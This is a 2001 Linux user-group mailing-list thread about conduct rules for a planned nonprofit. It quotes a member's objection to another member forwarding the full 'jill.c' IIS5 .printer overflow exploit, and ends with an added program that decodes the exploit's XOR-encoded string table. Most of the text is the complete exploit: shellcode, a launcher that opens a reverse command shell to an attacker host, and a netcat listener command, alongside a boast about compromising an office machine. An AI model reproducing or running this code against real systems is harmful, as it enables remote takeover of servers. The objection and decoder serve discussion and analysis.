NPO Bylaws: was Re: just incase you missed it

Eric Richardson plug-discuss@lists.PLUG.phoenix.az.us
Tue, 08 May 2001 07:44:18 -0700


Hi,
Here is an area that needs to be considered for the mission and the
bylaws of the NPO in creation. Principles and philosophy on conduct, and
what can and can't be done for the betterment of the organization, need
to be spelled out.

How you approach advocacy and education is very important as is shown in
this thread.
Eric

George Toft wrote:
> 
> In the interest of maintaining a professional list, and a professional
> image, I would appreciate this type of posting not continue.  It has no
> place here.  There are plenty of sites out there where we can get this
> stuff if we were so inclined.  Highlighting Microsoft's inability to
> patch the same overflow from one IIS version to the next does not
> favorably promote Linux at all - in fact, it continues the negative
> "Hacker OS" image that so many are working to overcome.
> 
> Perhaps I'm showing my age, but I don't see how making some underpaid[1]
> NT admin's life miserable by "0wning hiz b0x with a r00t wind0w" does
> him any good.  Sure, he looks like a moron to his boss, and they'll
> patch the OS (if they're lucky[2]), or pay some overpaid MCSE shyster to
> do it for them.
> 
> It also does not reflect well on you, as all you are doing is passing
> on someone else's work, just like a script-kiddie.  This post would be
> educational if you were to disassemble the embedded hex in unsigned
> char sploit and discuss in detail how and why it works.  (Not simply
> "it overruns the print buffer and sends me a console" - I got that much
> from the SANS and Security Portal e-mails.)
> 
> Anyone considering using this code might want to consider the
> ramifications of the Computer Fraud and Abuse Act[3].  Personally, I
> have more ambition than becoming Bubba's newest conquest.
> 
> Yes, I was offended.
> 
> George
> 
> References:
> 1. SANS Salary Survey,
> http://www.sans.org/newlook/publications/salary2000.htm, note 10.
> 2.  Security Portal,
> http://securityportal.com/articles/ntspseven20010507.html
> 3.  Computer Fraud and Abuse Act, 18 U.S.C. § 1030
> 
> Nigel Sollars wrote:
> 
> >  Hi,
> >
> >  Just in case you missed this one, here is the jill code .. the IIS5 printer
> > overflow exploit ...
> >
> > I've done a box here at the office .. hehe brings the term got root? to a
> > reality.
> >
> > Nige..
> >
> > code as follows :-
> >
> >                         /* IIS 5 remote .printer overflow. "jill.c" (don't ask).
> >                         *
> >                         * by: dark spyrit <dspyrit@beavuh.org>
> >                         *
> >                         * respect to eeye for finding this one - nice work.
> >                         * shouts to halvar, neofight and the beavuh bitchez.
> >                         *
> >                         * this exploit overwrites an exception frame to control eip and get to
> >                         * our code.. the code then locates the pointer to our larger buffer and
> >                         * execs.
> >                         *
> >                         * usage: jill <victim host> <victim port> <attacker host> <attacker port>
> >                         *
> >                         * the shellcode spawns a reverse cmd shell.. so you need to set up a
> >                         * netcat listener on the host you control.
> >                         *
> >                         * Ex: nc -l -p <attacker port> -vv
> >                         *
> >                         * I haven't slept in years.
> >                         */
> >
> >                         #include <sys/types.h>
> >                         #include <sys/time.h>
> >                         #include <sys/socket.h>
> >                         #include <netinet/in.h>
> >                         #include <arpa/inet.h>
> >                         #include <unistd.h>
> >                         #include <errno.h>
> >                         #include <stdlib.h>
> >                         #include <stdio.h>
> >                         #include <string.h>
> >                         #include <fcntl.h>
> >                         #include <netdb.h>
> >
> >                         int main(int argc, char *argv[]){
> >
> >                           /* the whole request rolled into one, pretty huh? carez. */
> >
> >                           unsigned char sploit[]=
> >                             "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
> >                             "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
> >                             "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
> >                             "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
> >                             "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
> >                             "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
> >                             "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
> >                             "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
> >                             "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
> >                             "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
> >                             "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
> >                             "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
> >                             "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
> >                             "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
> >                             "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
> >                             "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
> >                             "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
> >                             "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
> >                             "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
> >                             "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
> >                             "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
> >                             "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
> >                             "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
> >                             "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
> >                             "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
> >                             "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
> >                             "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
> >                             "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
> >                             "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
> >                             "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
> >                             "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
> >                             "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
> >                             "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
> >                             "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
> >                             "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
> >                             "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
> >                             "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
> >                             "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
> >                             "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
> >                             "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
> >                             "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
> >                             "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
> >                             "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
> >                             "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
> >                             "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
> >                             "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
> >
> >                           int s;
> >                           unsigned short int a_port;
> >                           unsigned long a_host;
> >                           struct hostent *ht;
> >                           struct sockaddr_in sin;
> >
> >                           printf("iis5 remote .printer overflow.\n"
> >                             "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");
> >
> >                           if (argc != 5){
> >                             printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
> >                             exit(1);
> >                           }
> >
> >                           if ((ht = gethostbyname(argv[1])) == 0){
> >                             herror(argv[1]);
> >                             exit(1);
> >                           }
> >
> >                           sin.sin_port = htons(atoi(argv[2]));
> >                           a_port = htons(atoi(argv[4]));
> >                           a_port^=0x9595;
> >
> >                           sin.sin_family = AF_INET;
> >                           sin.sin_addr = *((struct in_addr *)ht->h_addr);
> >
> >                           if ((ht = gethostbyname(argv[3])) == 0){
> >                             herror(argv[3]);
> >                             exit(1);
> >                           }
> >
> >                           a_host = *((unsigned long *)ht->h_addr);
> >                           a_host^=0x95959595;
> >
> >                           sploit[441]= (a_port) & 0xff;
> >                           sploit[442]= (a_port >> 8) & 0xff;
> >
> >                           sploit[446]= (a_host) & 0xff;
> >                           sploit[447]= (a_host >> 8) & 0xff;
> >                           sploit[448]= (a_host >> 16) & 0xff;
> >                           sploit[449]= (a_host >> 24) & 0xff;
> >
> >                           if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
> >                             perror("socket");
> >                             exit(1);
> >                           }
> >
> >                           printf("\nconnecting... \n");
> >
> >                           if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
> >                             perror("connect");
> >                             exit(1);
> >                           }
> >
> >                           write(s, sploit, strlen(sploit));
> >                           sleep (1);
> >                           close (s);
> >
> >                           printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
> >                           exit(0);
> >                         }
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> 
> --
> "Fate, it seems, is not without a sense of irony" - Morpheus
> 
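George's reply asks for the embedded hex to be decoded and explained rather than just forwarded. The program below is an added example written for this page; it is not part of any message in the thread and is not dark spyrit's code. It covers the one part of jill.c that can be analysed without touching a target: the short stub after the first NOP sled is a get-PC sequence followed by a loop that XORs the next 0x2d7 bytes with 0x95, and the tail of that encoded region is a NUL-separated string table. The program copies that table verbatim from the posted sploit[] array, reproduces the decoder, and recovers the Win32 and WinSock API names and the "cmd.exe" string it hides. It also shows why the wrapper XORs the attacker host and port with 0x95 before patching them into the body, and one consequence the wrapper ignores: the request is sent with strlen(), so an attacker octet of 0x95 pre-encodes to a NUL and truncates the request. The function names, the constructed sample port 0x391b (htons(6969) as a little-endian host holds it) and the string count are mine; the bytes, key, length and offsets are read off the posted code.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Key used by the posted decoder stub ("80 30 95" = xor byte [eax], 0x95). */
#define XOR_KEY 0x95u

/* Decoder stub as posted (sploit[56..86], right after the first NOP sled):
 *   eb 03             jmp  +3
 *   5d                pop  ebp        ; ebp = return address pushed by "call"
 *   eb 05             jmp  +5
 *   e8 f8 ff ff ff    call -8         ; lands on "pop ebp": classic get-PC
 *   83 c5 15          add  ebp, 0x15  ; ebp -> first byte after "loop"
 *   90 90 90          nop
 *   8b c5             mov  eax, ebp
 *   33 c9             xor  ecx, ecx
 *   66 b9 d7 02       mov  cx, 0x2d7  ; 727 bytes: up to the "\r\nHost: "
 *   50                push eax
 *   80 30 95          xor  byte [eax], 0x95
 *   40                inc  eax
 *   e2 fa             loop -6         ; back to the xor
 * Every byte of the body, including the host/port the wrapper patches in at
 * sploit[441..442] and sploit[446..449], is XORed with 0x95 at run time. */
#define DECODED_BODY_LEN 0x2d7

/* Tail of the encoded body, copied from the posted bytes: everything after the
 * "\x56" on the line beginning "\xc7\xc3\xc6" up to the "\x95" that precedes
 * "\x0d\x0a\x48\x6f\x73\x74" ("\r\nHost"). Each 0x95 here is an encoded NUL. */
static const unsigned char enc_table[] =
    "\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
    "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
    "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
    "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
    "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
    "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
    "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
    "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
    "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
    "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
    "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
    "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
    "\xf0\xed\xf0\x95";
#define ENC_TABLE_LEN (sizeof(enc_table) - 1)

#define MAX_STRINGS 32
#define MAX_STRLEN  32

/* Exactly what the stub's loop does to the body: buf[i] ^= key. */
void xor_decode(unsigned char *buf, size_t n, unsigned char key) {
    for (size_t i = 0; i < n; i++) buf[i] ^= key;
}

static char   g_strings[MAX_STRINGS][MAX_STRLEN];
static size_t g_count;
static int    g_decoded;

/* Decode the table once and split it at the NULs the key was hiding. */
static void ensure_decoded(void) {
    unsigned char buf[ENC_TABLE_LEN];
    size_t start = 0;
    if (g_decoded) return;
    memcpy(buf, enc_table, ENC_TABLE_LEN);
    xor_decode(buf, ENC_TABLE_LEN, XOR_KEY);
    for (size_t i = 0; i < ENC_TABLE_LEN && g_count < MAX_STRINGS; i++) {
        if (buf[i] != 0) continue;
        size_t len = i - start;
        if (len > MAX_STRLEN - 1) len = MAX_STRLEN - 1;
        memcpy(g_strings[g_count], buf + start, len);
        g_strings[g_count][len] = '\0';
        g_count++;
        start = i + 1;
    }
    g_decoded = 1;
}

size_t decoded_string_count(void) { ensure_decoded(); return g_count; }

const char *decoded_string(size_t i) {
    ensure_decoded();
    return i < g_count ? g_strings[i] : "";
}

/* The wrapper stores the attacker port/address pre-XORed (a_port ^= 0x9595,
 * a_host ^= 0x95959595) so the run-time decode restores the raw value. */
uint16_t pre_encode16(uint16_t v) { return (uint16_t)(v ^ 0x9595u); }
uint32_t pre_encode32(uint32_t v) { return v ^ 0x95959595u; }

/* Round trip: a pre-encoded port, decoded the way the stub does it, comes
 * back as the original network-order port. Returns 1 on success. */
int port_roundtrips(uint16_t port_net) {
    uint16_t stored = pre_encode16(port_net);
    unsigned char b[2] = { (unsigned char)(stored & 0xff), (unsigned char)(stored >> 8) };
    xor_decode(b, 2, XOR_KEY);
    return (b[0] | (b[1] << 8)) == port_net;
}

/* Caveat the wrapper ignores: it sends with write(s, sploit, strlen(sploit)),
 * so a pre-encoded byte of 0x00 (a raw host octet or port byte of 0x95) ends
 * the request early. Returns 1 if that would happen for these values. */
int wrapper_truncates(uint32_t host, uint16_t port) {
    uint32_t h = pre_encode32(host);
    uint16_t p = pre_encode16(port);
    for (int i = 0; i < 4; i++)
        if (((h >> (8 * i)) & 0xff) == 0) return 1;
    return (p & 0xff) == 0 || (p >> 8) == 0;
}

int main(void) {
    size_t n = decoded_string_count();
    printf("key 0x%02x, decoded body %d bytes, %zu strings in the table:\n",
           XOR_KEY, DECODED_BODY_LEN, n);
    for (size_t i = 0; i < n; i++) printf("  [%2zu] %s\n", i, decoded_string(i));
    /* constructed samples: port 0x391b, hosts 127.0.0.1 and 149.0.0.0 */
    printf("sample port survives the decode: %d\n", port_roundtrips(0x391b));
    printf("host 127.0.0.1 truncates: %d, host 149.0.0.0 truncates: %d\n",
           wrapper_truncates(0x0100007fu, 0x391b), wrapper_truncates(0x00000095u, 0x391b));
    return 0;
}
```

The recovered table is the import list the shellcode resolves by hand (GetProcAddress, LoadLibraryA, the pipe and process calls, then WSOCK32 and its socket functions) followed by the command it spawns, which is what the header comment means by "spawns a reverse cmd shell". Note that 0x391b pre-encodes to 0xac8e, the same two bytes (\x8e\xac) that sit at sploit[441..442] in the posted array, so the placeholder the wrapper overwrites is itself already encoded.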